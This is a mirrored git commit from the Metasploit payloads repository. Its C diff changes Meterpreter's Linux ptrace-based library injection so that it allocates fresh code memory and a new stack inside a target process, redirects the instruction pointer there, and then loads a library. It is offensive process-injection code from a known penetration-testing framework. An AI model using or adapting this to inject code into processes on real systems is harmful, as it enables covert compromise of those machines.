1
mirror of https://github.com/rapid7/metasploit-payloads synced 2025-03-12 12:14:29 +01:00

Create new code memory

This commit is contained in:
jvazquez-r7 2015-01-02 12:48:00 -06:00
parent 79692d5986
commit 63e993c735
2 changed files with 33 additions and 8 deletions

View File

@ -84,11 +84,12 @@ save_state(LONG pid, state *s) {
* @brief Restores the process state and detaches.
* @param pid Process identifier to restore.
* @param s Pointer to \c state with code and registers.
* @param only_memory Idicates if restore only memory at EIP or also registers
* @returns Indication of success or failure.
* @retval 0 Indicates success.
*/
LONG
restore_state(LONG pid, state *s) {
restore_state(LONG pid, state *s, int only_memory) {
unsigned long *mem_ptr = NULL;
LONG i = 0;
LONG result = 0;
@ -105,6 +106,9 @@ restore_state(LONG pid, state *s) {
if (result != 0)
return result;
if (only_memory > 0)
return 0;
result = setregs(pid, &(s->regs));
if (result != 0)
return result;
@ -250,6 +254,8 @@ call(LONG pid, struct user_regs_struct *regs, unsigned long addr) {
LONG
inject_library(LONG pid, library *l) {
state s;
long code_mem;
long stack_mem;
struct user_regs_struct regs;
ULONG library_size = _SIZE_OF(l->length);
unsigned long *buf_ptr = (unsigned long *)l->data;
@ -260,7 +266,6 @@ inject_library(LONG pid, library *l) {
goto end;
}
dprintf("[INJECT] Saving state");
result = attach(pid);
if (result != 0)
@ -272,14 +277,31 @@ inject_library(LONG pid, library *l) {
memcpy(&regs, &(s.regs), sizeof(struct user_regs_struct));
dprintf("[INJECT] Creating new code memory");
result = allocate(pid, &regs, NULL, CODE_SIZE);
if (result != 0)
goto restore;
dprintf("[INJECT] New code memory on 0x%x, fixing registers", regs.eax);
code_mem = regs.eax;
regs.eip = code_mem;
result = setregs(pid, &regs);
if (result != 0)
goto restore;
dprintf("[INJECT] Restoring code on original process");
restore_state(pid, &s, 1);
dprintf("[INJECT] Creating new stack");
result = allocate(pid, &regs, NULL, STACK_SIZE);
result = allocate(pid, &regs, NULL, STACK_SIZE);
if (result != 0)
goto restore;
dprintf("[INJECT] New stack on 0x%x, fixing registers", regs.eax);
regs.esp = regs.eax + STACK_SIZE;
regs.eip = s.regs.eip;
stack_mem = regs.eax + STACK_SIZE;
regs.esp = stack_mem;//regs.eax + STACK_SIZE;
regs.eip = code_mem;//s.regs.eip;
result = setregs(pid, &regs);
if (result != 0)
@ -301,7 +323,8 @@ inject_library(LONG pid, library *l) {
goto restore;
dprintf("[INJECT] Fixing registers");
regs.eip = s.regs.eip;
regs.esp = stack_mem;
regs.eip = code_mem;//s.regs.eip;
result = setregs(pid, &regs);
if (result != 0)
goto restore;
@ -316,7 +339,7 @@ inject_library(LONG pid, library *l) {
goto end;
restore:
restore_state(pid, &s);
restore_state(pid, &s, 0);
end:
return result;
}

View File

@ -31,6 +31,8 @@
#define ENTRY_POINT_POS 11
/*! Length of the new stack to allocate */
#define STACK_SIZE 0x200000
/*! Length of the new memory to store code stubs */
#define CODE_SIZE 0x1000
/*! @brief Container struct for a library to inject and execute. */
typedef struct {
@ -52,7 +54,7 @@ typedef struct {
} state;
LONG save_state(LONG pid, state *s);
LONG restore_state(LONG pid, state *s);
LONG restore_state(LONG pid, state *s, int only_memory);
BOOL wait_trap(LONG pid);
LONG execute_stub(LONG pid, unsigned long addr, unsigned long *stub, ULONG stub_size);
LONG allocate(LONG pid, struct user_regs_struct *regs, unsigned long addr, size_t length);